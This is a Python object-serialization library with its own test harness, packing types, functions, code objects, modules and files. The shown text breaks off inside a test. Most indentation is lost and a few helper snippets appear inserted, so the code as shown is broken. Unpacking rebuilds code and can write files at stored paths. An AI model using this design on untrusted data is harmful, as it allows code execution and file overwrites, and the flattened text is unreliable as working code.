return builtins.super
import _thread
@package.cache.register_const
class threadlock(__constant):
@classmethod
def getclass(cls):
return _thread.LockType
if 'core':
@package.cache.register_type
class type_(__type__):
'''any generic python type'''
# FIXME: when instantiating the hierarchy of types, this fails to associate
# the method with the proper parent class. this is apparent if you
# compare the help() of the original object to the deserialized object
@classmethod
def getclass(cls):
return type.getclass()
@classmethod
def subclasses(cls, type):
'''return all subclasses of type'''
if not builtins.isinstance(type, builtins.type):
raise AssertionError('%s is not a valid python type'% builtins.type(type))
if type.__bases__ == ():
return ()
result = type.__bases__
for x in type.__bases__:
result += cls.subclasses(x)
return result
@classmethod
def p_constructor(cls, object, **attributes):
name, bases, slots = (object.__name__, object.__bases__, ().__class__(getattr(object, '__slots__')) if hasattr(object, '__slots__') else None)
result = [slots, name]
result.extend(bases)
return ().__class__(result)
@classmethod
def u_constructor(cls, data, **attributes):
result = [].__class__(data)
slots, name = result.pop(0), result.pop(0)
if slots is None:
return builtins.type(name, ().__class__(result), {})
return builtins.type(name, ().__class__(result), {'__slots__': slots})
@classmethod
def p_instance(cls, object, **attributes):
state = {key : value for key, value in getattr(object, '__dict__', {}).items()}
if hasattr(object, '__slots__'):
state.update((k, getattr(object, k)) for k in object.__slots__ if hasattr(object, k))
f = lambda: wat
t = builtins.type(f)
# non-serializeable descriptors
getset_descriptor = cls.__weakref__.__class__
method_descriptor = cls.__reduce_ex__.__class__
wrapper_descriptor = cls.__setattr__.__class__
member_descriptor = t.func_globals.__class__ if sys.version_info.major < 3 else t.__globals__.__class__
classmethod_descriptor = builtins.type(builtins.float.__dict__['fromhex'])
result = {}
for k, v in state.items():
if builtins.type(v) in {getset_descriptor, method_descriptor, wrapper_descriptor, member_descriptor, classmethod_descriptor, generator_.getclass()}:
continue
try:
_ = package.cache.byinstance(v)
except (KeyError, TypeError):
continue
result[k] = v
return result
@classmethod
def u_instance(cls, instance, data, **attributes):
for k, v in data.items():
try:
setattr(instance, k, v)
except (TypeError, AttributeError):
pass
return instance
if sys.version_info.major < 3:
@package.cache.register_type
class classobj(type_):
'''an old-style python class'''
@classmethod
def getclass(cls):
return builtins.type(package)
@package.cache.register_type
class Object(__constant):
@classmethod
def getclass(cls):
return builtins.object
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new()
@package.cache.register
class object_(type_):
'''a generic python object and all it's parentclass' properties'''
@classmethod
def p_constructor(cls, object, **attributes):
name, type = getattr(object, '__name__', None), object.__class__
# FIXME: we should check for serialization methods here
# like getnewargs, getstate, reduce, etc.
return (name, type)
@classmethod
def u_constructor(cls, data, **attributes):
name, type = data
type.__name__ = name or ''
object = cls.getclass()
wrapper_descriptor, builtin_function_or_method = (item.__class__ for item in [object.__init__, object.__new__])
# FIXME: create the instance illegitimately
if type.__new__.__class__ is not builtin_function_or_method:
raise Exception('Unable to support custom-defined .__new__ operators')
# TODO: bniemczyk would like a hint here for customizing __new__
old_init, new_init = type.__init__, lambda self: None,
type.__init__ = new_init
result = type()
type.__init__ = old_init
#result.__name__ = name
return result
@classmethod
def p_instance(cls, object, **attributes):
c = type_
result = [(c.id, c.p_instance(object, **attributes))]
for t in type_.subclasses(builtins.type(object)):
try:
c = package.cache.byclass(t)
except KeyError:
continue
result.append( (c.id, c.p_instance(object, **attributes)) )
return result
@classmethod
def u_instance(cls, instance, data, **attributes):
if len(data) == 0:
return instance
for id, data in data:
c = package.cache.byid(id)
instance = c.u_instance(instance, data, **attributes)
return instance
@package.cache.register
class module_local(__constant):
'''module that is locally stored in the filesystem'''
@classmethod
def getclass(cls):
return module.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__name__
@classmethod
def u_constructor(cls, data, **attributes):
name = data
return module.instancelocal(name)
@package.cache.register_type
class module_(module_local):
'''a module and it's attributes in memory'''
@classmethod
def p_constructor(cls, object, **attributes):
if sys.version_info.major < 3:
return '', object.__name__, object.__doc__
spec = object.__spec__
return spec.name if isinstance(spec.loader, __import__('_frozen_importlib').BuiltinImporter) else '', object.__name__, object.__doc__
@classmethod
def u_constructor(cls, data, **attributes):
spec, name, doc = data
if sys.version_info.major < 3 or not spec:
return cls.new(name, doc)
            res = __import__(spec)
res.__name__, res.__doc__ = name, doc
return res
@classmethod
def p_instance(cls, object, **attributes):
if sys.version_info.major >= 3 and hasattr(object, '__spec__') and isinstance(object.__spec__.loader, __import__('_frozen_importlib').BuiltinImporter):
return {}
ignored = ('__builtins__', '__loader__')
return {k : v for k, v in object.__dict__.items() if k not in ignored}
@classmethod
def u_instance(cls, instance, data, **attributes):
for attribute, value in data.items():
setattr(instance, attribute, value)
return instance
if sys.version_info.major >= 3:
@package.cache.register_const
class ModuleSpec(__constant):
@classmethod
def getclass(cls):
return __import__('_frozen_importlib').ModuleSpec
@package.cache.register_type
class ModuleSpec_(__type__):
@classmethod
def getclass(cls):
return __import__('_frozen_importlib').ModuleSpec
@classmethod
def p_constructor(cls, object, **attributes):
#return object.name, object.loader, object.origin, object.loader_state, hasattr(object, '__path__')
return object.name, None, object.origin, object.loader_state, hasattr(object, '__path__')
@classmethod
def u_constructor(cls, data, **attributes):
cons = cls.getclass()
name, loader, origin, loader_state, is_package = data
#return cons(name, loader, parent=parent, origin=origin, loader_state=loader_state, is_package=is_package)
return cons(name, None, origin=origin, loader_state=loader_state, is_package=is_package)
@classmethod
def p_instance(cls, object, **attributes):
return object.submodule_search_locations
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.submodule_search_locations = data
return instance
if 'builtin':
class __builtin(__type__):
@classmethod
def p_constructor(cls, object, **attributes):
return object
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data)
@classmethod
def p_instance(cls, object, **attributes):
return ()
@classmethod
def new(cls, *args, **kwds):
return cls.getclass()(*args, **kwds)
@package.cache.register_type
class bool_(__builtin):
'''standard boolean type'''
@classmethod
def getclass(cls):
return bool.getclass()
@package.cache.register_type
class int_(__builtin):
'''integral value'''
@classmethod
def getclass(cls):
return int.getclass()
@package.cache.register_type
class float_(__builtin):
'''float value'''
@classmethod
def getclass(cls):
return float.getclass()
if sys.version_info.major < 3:
@package.cache.register_type
class long_(__builtin):
'''long value'''
@classmethod
def getclass(cls):
return long.getclass()
@package.cache.register_type
class complex_(__builtin):
'''complex value'''
@classmethod
def getclass(cls):
return complex.getclass()
## sequence types
@package.cache.register_type
class str_(__builtin):
'''str value'''
@classmethod
def getclass(cls):
return str.getclass()
if sys.version_info.major < 3:
@package.cache.register_type
class unicode_(__builtin):
'''unicode string'''
@classmethod
def getclass(cls):
return unicode.getclass()
@package.cache.register_type
class buffer_(__builtin):
'''string buffer'''
@classmethod
def getclass(cls):
return buffer.getclass()
else:
@package.cache.register_type
class bytes_(__builtin):
'''unicode string'''
@classmethod
def getclass(cls):
return bytes.getclass()
if 'immutable':
@package.cache.register_type
class tuple_(__type__):
'''an immutable tuple'''
@classmethod
def getclass(cls):
return tuple.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object
@classmethod
def u_constructor(cls, data, **attributes):
return ().__class__(data)
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ()
@classmethod
def u_instance(cls, instance, data, **attributes):
return instance
if 'mutable':
class __mutable(__type__):
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data)
@classmethod
def new(cls, *args, **kwds):
return cls.getclass()(*args, **kwds)
@package.cache.register_type
class list_(__mutable):
'''a list'''
@classmethod
def getclass(cls):
return list.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
@classmethod
def u_instance(cls, instance, data, **attributes):
'''update the object with the provided data'''
instance[:] = data
return instance
@package.cache.register_type
class dict_(__mutable):
'''a dictionary'''
@classmethod
def getclass(cls):
return dict.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return object
@classmethod
def u_instance(cls, instance, data, **attributes):
'''update the object with the provided data'''
instance.clear()
instance.update(data)
return instance
@package.cache.register_type
class set_(__mutable):
'''a set'''
@classmethod
def getclass(cls):
return set.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.clear()
instance.update(data)
return instance
@package.cache.register_type
class frozenset_(__mutable):
'''a frozenset'''
@classmethod
def getclass(cls):
return frozenset.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
if 'special':
class __special(__type__):
attributes = None
@classmethod
def getclass(cls):
raise NotImplementedError(cls)
@classmethod
def p_constructor(cls, object, **attributes):
result = {}
if cls.attributes.__class__ == {}.__class__:
result.update((k, getattr(object, k, cls.attributes[k])) for k in cls.attributes)
else:
result.update((k, getattr(object, k)) for k in cls.attributes)
return result
@classmethod
def p_instance(cls, object, **attributes):
return ()
@package.cache.register_type
class instancemethod_(__special):
'''a python class method'''
attributes = ['im_func', 'im_self', 'im_class']
@classmethod
def getclass(cls):
return instancemethod.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data['im_func'], data['im_self'], data['im_class'])
@package.cache.register_type
class property_(__special):
'''a python class property'''
attributes = ['fdel', 'fset', 'fget']
@classmethod
def getclass(cls):
return property.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
return property.new(fget=data['fget'], fset=data['fset'], fdel=data['fdel'])
@package.cache.register_type
class code_(__special):
'''a python code type'''
if sys.version_info.major < 3:
attributes = [
'co_argcount', 'co_nlocals', 'co_stacksize', 'co_flags', 'co_code',
'co_consts', 'co_names', 'co_varnames', 'co_filename', 'co_name',
'co_firstlineno', 'co_lnotab', 'co_freevars', 'co_cellvars'
]
else:
attributes = [
'co_argcount', 'co_posonlyargcount', 'co_kwonlyargcount', 'co_nlocals', 'co_stacksize',
'co_flags', 'co_code', 'co_consts', 'co_names', 'co_varnames',
'co_filename', 'co_name', 'co_firstlineno', 'co_lnotab',
'co_freevars', 'co_cellvars'
]
@classmethod
def getclass(cls):
return code.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
result = (data[k] for k in cls.attributes)
return code.new(*result)
@package.cache.register_type
class function_(__type__):
'''a python function'''
@classmethod
def getclass(cls):
return function.getclass()
# FIXME: having to include the globals for an unbound function (__module__ is undefined) might be weird
@classmethod
def p_constructor(cls, object, **attributes):
# so...it turns out that only the closure property is immutable
res = object.func_closure if sys.version_info.major < 3 else object.__closure__
func_closure = () if res is None else res
func_code = object.func_code if sys.version_info.major < 3 else object.__code__
if object.__module__ is None:
raise AssertionError('FIXME: Unable to pack an unbound function')
return object.__module__, func_code, ().__class__(cell.cell_contents for cell in func_closure)
@classmethod
def u_constructor(cls, data, **attributes):
# modulename, code, closure, globals = data
modulename, code, closure = data
            if modulename is None:
raise AssertionError('FIXME: Unable to unpack an unbound function')
# XXX: assign the globals from hints if requested
globs = attributes['globals'] if 'globals' in attributes else module.instance(modulename).__dict__
result = cls.cell(*closure)
return function.new(code, globs, closure=result)
@classmethod
def p_instance(cls, object, **attributes):
if sys.version_info.major < 3:
return object.func_code, object.func_name, object.func_defaults
return object.__code__, object.__name__, object.__defaults__
@classmethod
        def u_instance(cls, instance, data, **attributes):
            if sys.version_info.major < 3:
                instance.func_code, instance.func_name, instance.func_defaults = data
            else:
                instance.__code__, instance.__name__, instance.__defaults__ = data
            return instance
@classmethod
def cell(cls, *args):
'''Convert args into a cell tuple'''
if sys.version_info.major < 3:
return ().__class__(((lambda item: lambda : item)(item).func_closure[0]) for item in args)
return ().__class__(((lambda item: lambda : item)(item).__closure__[0]) for item in args)
@package.cache.register
class builtin_(__constant):
'''copy from local module and name'''
@classmethod
def getclass(cls):
return builtin.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return (object.__module__, object.__name__)
@classmethod
def u_constructor(cls, data, **attributes):
mod, name = data
m = module.instancelocal(mod)
return getattr(m, name)
if sys.version_info.major < 3:
@package.cache.register
class file_(__constant):
'''A file..for serializing the contents of the file look at file_contents'''
@classmethod
def getclass(cls):
return file.getclass()
@classmethod
def p_constructor(cls, file, **attributes):
offset = file.tell()
return file.name, file.mode, offset
@classmethod
def u_constructor(cls, data, **attributes):
name, mode, offset = data
file = open(name, mode)
file.seek(offset)
return file
@package.cache.register
class file_contents(file_):
# FIXME: save the whole file.. (should be selected via a hint)
@classmethod
def getclass(cls):
return file.getclass()
@classmethod
def p_constructor(cls, file, **attributes):
offset = file.tell()
file.seek(0)
content = file.read()
file.seek(offset)
return (file.name, file.mode, offset, content)
@classmethod
def u_constructor(cls, data, **attributes):
name, mode, offset, content = data
file = open(name, "w")
file.write(content)
file.close()
file = open(name, mode)
file.seek(offset)
return file
import _weakref
@package.cache.register_type
class weakref_(__type__):
@classmethod
def getclass(cls):
return _weakref.ReferenceType
@classmethod
def p_constructor(cls, object, **attributes):
return (object(),)
@classmethod
def u_constructor(cls, data, **attributes):
object, = data
class extref(_weakref.ref):
def __new__(self, object):
self.__cycle__ = object
return _weakref.ref(object)
# return super(extref, self)(object)
return extref(object)
@classmethod
def p_instance(cls, object, **attributes):
return ()
@package.cache.register_type
class super_(__type__):
@classmethod
def getclass(cls):
return builtins.super
@classmethod
def p_constructor(cls, object, **attributes):
return (object.__thisclass__, object.__self__)
@classmethod
def u_constructor(cls, data, **attributes):
thisclass, self = data
return builtins.super(thisclass, self)
@classmethod
def p_instance(cls, object, **attributes):
return ()
import _thread
@package.cache.register_type
class threadlock_(__type__):
@classmethod
def getclass(cls):
return _thread.LockType # XXX
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return _thread.allocate_lock()
@classmethod
def p_instance(cls, object, **attributes):
return ()
# XXX: the following aren't completed...maybe never will be
@package.cache.register_type
class generator_(__type__):
@classmethod
def getclass(cls):
return generator.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
raise NotImplementedError('Unable to pack objects of type generator_') # Due to the gi_frame property
return object.gi_running, object.gi_code, object.gi_frame
@classmethod
def u_constructor(cls, data, **attributes):
co, fr = data
result = function.new(co, fr.f_globals)
raise NotImplementedError('Unable to unpack objects of type generator_')
return result
@classmethod
def p_instance(cls, object, **attributes):
return ()
@classmethod
def u_instance(cls, instance, data, **attributes):
return instance
@package.cache.register_type
class frame_(incomplete): # FIXME: can't construct these, we can create a shell object for these tho maybe
attributes = ['f_back', 'f_builtins', 'f_code', 'f_exc_traceback', 'f_exc_type', 'f_exc_value', 'f_globals', 'f_lasti', 'f_lineno', 'f_locals', 'f_restricted', 'f_trace']
@classmethod
def getclass(cls):
return frame.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
raise NotImplementedError('Unable to pack objects of type frame_')
@classmethod
def u_constructor(cls, data, **attributes):
raise NotImplementedError('Unable to unpack objects of type frame_')
@package.cache.register_type
class staticmethod_(__constant):
@classmethod
def getclass(cls):
return Staticmethod.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__func__,
@classmethod
def u_constructor(cls, data, **attributes):
fn, = data
return cls.new(fn)
@package.cache.register_type
class classmethod_(__constant):
@classmethod
def getclass(cls):
return Classmethod.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__func__,
@classmethod
def u_constructor(cls, data, **attributes):
fn, = data
return cls.new(fn)
import re, _sre
@package.cache.register_type
class re_pattern(__constant):
@classmethod
def getclass(cls):
res = _sre.compile('', 0, [1], 0, {}, ())
return res.__class__
@classmethod
def p_constructor(cls, object, **attributes):
return object.pattern, object.flags
@classmethod
def u_constructor(cls, data, **attributes):
pattern, flags = data
return re._compile(pattern, flags)
if 'operator':
import functools, operator
class __operator_reduceable(__constant):
@classmethod
def p_constructor(cls, object, **attributes):
return object.__reduce__()
@classmethod
def u_constructor(cls, data, **attributes):
t, parameters = data
return t(*parameters)
@package.cache.register_const
class partial(__constant):
@classmethod
def getclass(cls):
return functools.partial
@package.cache.register_type
class partial_(__operator_reduceable):
@classmethod
def getclass(cls):
return functools.partial
@classmethod
def p_constructor(cls, object, **attributes):
t = object.__class__
return t, (object.func, object.args, object.keywords)
@classmethod
def u_constructor(cls, data, **attributes):
t, (f, args, kwargs) = data
return t(f, *args, **kwargs)
@package.cache.register_const
class attrgetter(__constant):
@classmethod
def getclass(cls):
return operator.attrgetter
@package.cache.register_type
class attrgetter_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.attrgetter
# Python2 methodology for determining which attributes
# of a class are being touched by an operator.
@classmethod
def attribute_collector(cls, append):
def closure(self, name, append=append):
items = [name]
append(items)
return cls.attribute_collector(items.append)
class dummy(object): pass
dummy.__getattribute__ = closure
return dummy()
@classmethod
def attribute_flatten(cls, items):
def collect(item):
if len(item) > 1:
head, tail = item[0], collect(item[1])
return [head] + tail
return item
return [collect(item) for item in items]
# Python2 methodology of figuring out the attributes
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.attribute_collector(state.append)
object(dummy)
attribs = cls.attribute_flatten(state)
return t, ().__class__('.'.join(item) for item in attribs)
def __p_constructor_v3(cls, object, **attributes):
return object.__reduce__()
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@package.cache.register_const
class itemgetter(__constant):
@classmethod
def getclass(cls):
return operator.itemgetter
@package.cache.register_type
class itemgetter_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.itemgetter
# Python2 methodology for determining which items
# of an object are being fetched by an operator.
@classmethod
def item_collector(cls, append):
def closure(self, item, append=append):
append(item)
return None
class dummy(object): pass
dummy.__getitem__ = closure
return dummy()
# Python2 methodology of figuring out the items
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.item_collector(state.append)
object(dummy)
return t, ().__class__(item for item in state)
def __p_constructor_v3(cls, object, **attributes):
return object.__reduce__()
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@package.cache.register_const
class methodcaller(__constant):
@classmethod
def getclass(cls):
return operator.methodcaller
@package.cache.register_type
class methodcaller_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.methodcaller
# Python2 methodology for determining which attributes
# of a class will be called by an operator
@classmethod
def method_collector(cls, append):
def preserve(state):
def call(*args, **kwargs):
state.append((args, kwargs))
return call
def closure(self, name, callable=preserve, append=append):
item = [name]
append(item)
return callable(item)
class dummy(object): pass
dummy.__getattribute__ = closure
return dummy()
# Python2 methodology of figuring out the attributes
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.method_collector(state.append)
object(dummy)
f, (args, keywords) = state[0]
fargs = (f,) + args
return t, (fargs, keywords)
def __p_constructor_v3(cls, object, **attributes):
partial, args = object.__reduce__()
if partial is cls.getclass():
return partial, (args, {})
return partial.func, (partial.args + args, partial.keywords)
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@classmethod
def u_constructor(cls, data, **attributes):
t, (args, keywords) = data
return t(*args, **keywords)
## regular functions
#import cPickle as pickle
import marshal as pickle
def dumps(object, **attributes):
'''Convert any python object into a string.'''
return pickle.dumps(package.pack(object, **attributes))
def loads(data, **attributes):
'''Convert a string back into a python object.'''
return package.unpack(pickle.loads(data), **attributes)
def pack(object, **attributes):
'''Serialize an instance of a python object into a tuple'''
return package.pack(object, **attributes)
def unpack(data, **attributes):
'''Deserialize a tuple back into an instance'''
return package.unpack(data, **attributes)
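# Hedged usage sketch (not part of the original module): round-trip a plain
# object through the pack/unpack helpers defined above. The object contents
# here are illustrative assumptions, not data taken from the source.
def _example_roundtrip():
    original = {'hello': 'world', 'numbers': [1, 2, 3]}
    packed = pack(original)        # tuple-based package describing the object graph
    restored = unpack(packed)      # rebuild an equivalent object from the package
    return restored == original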
import sys
def caller(frame=None):
"""Return the (module, name) of the requested frame.
This will default to the calling function if a frame is not supplied.
"""
import sys
fr = sys._getframe().f_back if frame is None else frame
source, name = fr.f_code.co_filename, fr.f_code.co_name
module = [x for x in sys.modules.values() if hasattr(x, '__file__') and (x.__file__.endswith(source) or x.__file__.endswith('%sc'%source))]
module, = (None,) if not module else module
return module, name
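# Hedged illustration (an assumption, not original code): when called with no
# frame, caller() reports the module and function name of its own call site.
def _example_caller():
    module, name = caller()
    return module, name    # here `name` would be '_example_caller'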
if __name__ == '__main__':
import traceback
class Result(Exception): pass
class Success(Result): pass
class Failure(Result): pass
Werror = True
TestCaseList = []
def TestCase(fn):
def harness(**kwds):
name = fn.__name__
try:
res = fn(**kwds)
raise Failure
except Success as E:
print('%s: %r'% (name, E))
return True
except Failure as E:
print('%s: %r'% (name, E))
except Exception as E:
print('%s: %r : %r'% (name, Failure(), E))
#print(traceback.format_exc())
return False
TestCaseList.append(harness)
return fn
if __name__ == '__main__':
from builtins import *
import builtins, fu
# lame helpers for testcases
def make_package(cls, cons, inst):
m, n = '__main__', 'unnamed'
result = (fu.VERSION, 0, ({0:(cls.id, cons)}, {0:(cls.id, inst)}))
# result = (fu.VERSION, 0, ({0:(cls.id, (m, n), cons)}, {0:(cls.id, inst)}))
return result
def extract_package(package):
_, id, (cons, inst) = package
return id, cons, inst
def check_package(package):
ver, id, (cons, inst) = package
if {item for item in cons.keys()} != {item for item in inst.keys()}:
return False
if ver != fu.VERSION:
return False
return id in cons
class A(object):
pass
class B(A):
def method(self):
return 'B'
class C1(B):
def method_c1(self):
return 'C1'
class C2(B):
def method_c2(self):
return 'C2'
class D(C1, C2):
def method_c1(self):
return 'D'
if __name__ == '__main__':
@TestCase
def test_pack_type():
input = True
result = fu.package.pack(input)
if check_package(result):
raise Success
@TestCase
def test_builtin_pack():
input = 0x40
result = fu.package.pack(input)
id, cons, inst = extract_package(result)
if cons[id][-1] == input:
raise Success
@TestCase
def test_builtin_unpack():
input = make_package(fu.bool_, True, ())
result = fu.package.unpack(input)
if result == True:
raise Success
@TestCase
def test_constant_unpack():
input = make_package(fu.none, (), ())
result = fu.package.unpack(input)
if result == None:
raise Success
@TestCase
def test_list_pack():
l = [item for item in range(5)]
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(cons) == len(l) + 1:
raise Success
@TestCase
def test_listref_pack():
a = [item for item in range(5)]
l = 4 * [a]
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
_, items = inst[id]
if check_package(result) and len(cons) == len(inst) == len(a) + 1 + 1 and len({item for item in items}) == 1:
raise Success
@TestCase
def test_listrecurse_pack():
a = []
a.append(a)
result = fu.package.pack(a)
id, cons, inst = extract_package(result)
if inst[id][1][0] == id:
raise Success
@TestCase
def test_dict_pack():
l = {'hello': 'world', 5: 10, True: False}
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(inst) == len(cons) == 2 * len(l) + 1:
raise Success
@TestCase
def test_dictref_pack():
a = [item for item in range(5)]
l = {'hello': a, 'world': a}
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(cons) == len(inst) == len(a) + 1 + len(l) + 1:
raise Success
@TestCase
def test_dictrecurse_pack():
a = {}
a[5] = a
result = fu.package.pack(a)
id, cons, inst = extract_package(result)
if check_package(result) and [item for item in inst[id][1].values()][0] == id:
raise Success
@TestCase
def test_listref_unpack():
a = [5]
a.append(a)
data = fu.package.pack(a)
y = fu.package.unpack(data)
if y[1][1][0] == 5:
raise Success
@TestCase
def test_dictref_unpack():
a = {}
a[5] = None
a[6] = a
data = fu.package.pack(a)
y = fu.package.unpack(data)
if y[6][5] is None:
raise Success
def test_code_packunpack_v2():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func.func_code)
b = fu.package.unpack(a)
if func.func_code.co_name == b.co_name and func.func_code is not b:
raise Success
def test_code_packunpack_v3():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func.__code__)
b = fu.package.unpack(a)
if func.__code__.co_name == b.co_name and func.__code__ is not b:
raise Success
test_code_packunpack = TestCase(test_code_packunpack_v2 if sys.version_info.major < 3 else test_code_packunpack_v3)
@TestCase
def test_func_packunpack():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func)
b = fu.package.unpack(a)
if func is not b and b('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_type_packunpack():
class blah(object):
def func(self, *args):
return ' '.join(args)
a = fu.package.pack(blah)
b = fu.package.unpack(a)
b = b()
if b.func('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_instance_packunpack():
class blah(object):
def func(self, *args):
return ' '.join(args)
a = fu.package.pack(blah())
b = fu.package.unpack(a)
if b.func('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_typevalue_packunpack():
class blah(object):
junk = 'whee'
a = fu.package.pack(blah)
b = fu.package.unpack(a)
if b.junk == 'whee':
raise Success
@TestCase
def test_instancevalue_packunpack():
class blah(object):
junk = 'whee'
a = fu.package.pack(blah())
b = fu.package.unpack(a)
if b.junk == 'whee':
raise Success
@TestCase
def test_class_packunpack():
p = fu.package.pack(A)
result = fu.package.unpack(p)
if result.__name__ == 'A':
raise Success
@TestCase
def test_multiclass_packunpack():
p = fu.package.pack(B)
result = fu.package.unpack(p)
if result().method() == 'B':
raise Success
@TestCase
def test_derived_packunpack():
p = fu.package.pack(C1)
result = fu.package.unpack(p)
if result().method() == 'B':
raise Success
@TestCase
def test_multiclass_packunpack():
p = fu.package.pack(C1)
result = fu.package.unpack(p)
if result().method_c1() == 'C1' and result().method() == 'B':
raise Success
@TestCase
def test_multiinheritance_packunpack():
p = fu.package.pack(D)
result = fu.package.unpack(p)
if result().method_c1() == 'D' and result().method_c2() == 'C2':
raise Success
@TestCase
def test_python_gay():
class test(object):
def fiver(self):
return 5
class test2(test):
def tenor(self):
return 10
a = test2()
identity = id(a.tenor) == id(a.fiver)
if identity is not True:
raise AssertionError('yay, your python isn\'t lying about id being unique')
if a.tenor() != a.fiver():
raise Success
@TestCase
def test_func_closure():
def fn(a1, a2):
def closure(a3):
return (a1+a2)*a3
return closure
a = fn(1, 2)
b = fu.package.pack(a)
c = fu.package.unpack(b)
if a(222) == int(c('6')):
raise Success
# @TestCase # FIXME
def test_unknown_type():
# error while serializing a 'TypeInfo' object which comes from a module implemented in C
# if we can
import xml.dom.minidom
a = fu.package.pack(xml.dom.minidom)
b = fu.package.unpack(a)
@TestCase
def test_inheritance_native():
class blah([].__class__): pass
x = blah()
x.append(5)
a = fu.package.pack(x)
b = fu.package.unpack(a)
if len(x) == len(b):
raise Success
@TestCase
def test_const_list():
t = type([])
a = fu.package.pack(t)
b = fu.package.unpack(a)
if b is t:
raise Success
@TestCase
def test_type_intbool():
v = 1
a = fu.package.pack(v)
b = fu.package.unpack(a)
if b == v and type(b) == type(v):
raise Success
@TestCase
def test_module_builtin():
import sys
a = fu.pack(sys)
b = fu.unpack(a)
if b is sys:
raise Success
@TestCase
def test_module_general():
import re
a = re.compile('fuckyou', 0)
b = fu.pack(a)
c = fu.unpack(b)
if id(b) != id(c) if sys.version_info.major < 3 else c is not a:
raise Success
# @TestCase
def test_module():
import fu
a = fu.package.pack(fu)
b = fu.package.unpack(a)
if b.VERSION == fu.VERSION and b is not fu:
raise Success
# @TestCase
def test_ignore_modulepack():
import sys
a = fu.package.pack(sys, local=('sys',))
_, x, y = a
if y[0][x][0] is not fu.module.id:
raise Failure
b = fu.package.unpack(a)
if sys.winver is b.winver:
raise Success
# @TestCase
def test_ignore_moduleunpack():
import _ast as testpackage
a = fu.package.pack(testpackage)
_, x, y = a
if y[0][x][0] is not fu.module_.id:
raise Failure
b = fu.package.unpack(a, local=('_ast',))
if b is testpackage:
raise Success
#@TestCase
def test_ptype_pack():
from ptypes import pint
a = pint.uint32_t()
a.setoffset(id(builtins.type))
result = a.l.value
b = fu.package.unpack(fu.package.pack(a))
if b.value == result:
raise Success
#@TestCase
def test_continuation_yield():
def fn():
yield 1
yield 2
global a, b, c
a = fn()
if a.next() != 1:
raise AssertionError
b = fu.package.pack(a)
c = fu.package.unpack(b)
if c.next() == 2:
raise Success
@TestCase
def test_weakref_packunpack():
import fu, _weakref
a = set(('hello', ))
b = _weakref.ref(a)
c = fu.pack(b)
d = fu.unpack(c)
if list(b()) == list(d()):
raise Success
@TestCase
def test_super_packunpack():
import fu
class blah({item for item in []}.__class__):
def huh(self):
return 5
class blahsub(blah):
def huh(self):
return super(blahsub, self)
# FIXME: this is busted in python2
a = blahsub((20, 40, 60))
b = a.huh()
c = fu.pack(b)
d = fu.unpack(c)
if d.huh() == b.huh():
raise Success
@TestCase
def test_threadlock_packunpack():
import _thread, fu
a = _thread.allocate_lock()
b = fu.pack(a)
c = fu.unpack(b)
if a.__class__ == c.__class__:
raise Success
@TestCase
def test_object_instance_packunpack():
import fu
a = object()
b = fu.pack(a)
c = fu.unpack(b)
if type(a) == type(c) and isinstance(c, type(a)):
raise Success
@TestCase
def test_instancevalue_slots_packunpack():
import fu
class mytype(object):
__slots__ = ['blargh', 'huh']
readonly = 20
#blargh = 500
#huh = 20
a = mytype()
b = fu.unpack(fu.pack(a))
try:
b.blargh = 500
b.huh = 500
except AttributeError:
raise Failure("Unable to assign to slots")
try:
b.readonly = 20
raise Failure("Successfully assigned to a readonly property")
except AttributeError:
pass
try:
b.nope = None
raise Failure("Assigned a property to a __dict__ instead of an allocated slot")
except AttributeError:
pass
if b.blargh == b.huh == 500 and b.readonly == 20:
raise Success
@TestCase
def test_operator_partial():
def fucker(x, y, z):
return x * y + z
f = functools.partial(fucker, 2, 3)
g = fu.unpack(fu.pack(f))
if f(1) == g(1):
raise Success
@TestCase
def test_operator_attrgetter_0():
class t(object):
mine = 5
f = operator.attrgetter('mine')
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_attrgetter_1():
